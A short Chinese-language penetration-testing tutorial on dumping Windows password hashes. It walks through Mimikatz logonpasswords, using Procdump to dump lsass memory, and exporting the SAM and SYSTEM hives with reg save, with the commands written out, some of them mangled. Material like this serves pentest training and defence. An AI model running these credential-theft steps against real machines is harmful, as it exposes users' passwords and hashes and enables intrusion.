內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)
1、直接讀取
Mimikatz讀取明文密碼和hash時需要管理員權(quán)限。
privilege::debug //提升至debug權(quán)限
sekurlsa::logonpasswords //抓取密碼
2、Procdump+Mimikatz離線讀取lsass.dmp文件
Procdump是微軟官方發(fā)布的工具,可以用來將目標lsass文件導(dǎo)出。先在目標機器上上傳Procdump,導(dǎo)出lsass.dmp
procdump64.exe-accepteula-ma
lsass.exe lsass.dmp
將目標機上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:
sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中
sekurlsa::logonpasswords full //獲取密碼
3、通過SAM和System文件抓取密碼和Hash
首先利用注冊表命令將目標機的sam或者system文件導(dǎo)出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后將目標機上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:
token::elevate
lsadump::sam
請輸入評論內(nèi)容...
請輸入評論/評論長度6~500個字
圖片新聞
最新活動更多
- 高級軟件工程師 廣東省/深圳市
- 自動化高級工程師 廣東省/深圳市
- 光器件研發(fā)工程師 福建省/福州市
- 銷售總監(jiān)(光器件) 北京市/海淀區(qū)
- 激光器高級銷售經(jīng)理 上海市/虹口區(qū)
- 光器件物理工程師 北京市/海淀區(qū)
- 激光研發(fā)工程師 北京市/昌平區(qū)
- 技術(shù)專家 廣東省/江門市
- 封裝工程師 北京市/海淀區(qū)
- 結(jié)構(gòu)工程師 廣東省/深圳市